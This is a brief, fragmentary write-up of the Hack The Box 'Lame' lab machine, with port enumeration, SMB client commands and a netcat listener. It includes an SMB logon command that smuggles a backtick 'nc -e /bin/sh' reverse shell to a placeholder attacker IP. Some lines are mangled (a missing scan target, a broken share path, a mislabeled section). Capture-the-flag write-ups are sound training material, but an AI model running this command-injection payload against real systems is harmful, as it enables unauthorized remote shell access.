Hack The Box: Lame Write-up

nmap -A -p-

From the above enumeration, We can see that Port 21(FTP vsftpd 2.3.4), Port 22(ssh), Port 139(netbios-ssn), Port 445(netbios-ssn) and Port 3632 are open.

Port 21:

sudo smbmap -H
sudo smbclient // — option=”client min protocol = NT1"
nc -lvnp 4444
logon “/=`nohup nc -nv <Attacker IP> 4444 -e /bin/sh`”
find / -name “*.txt” -maxdepth 3 2>/dev/null




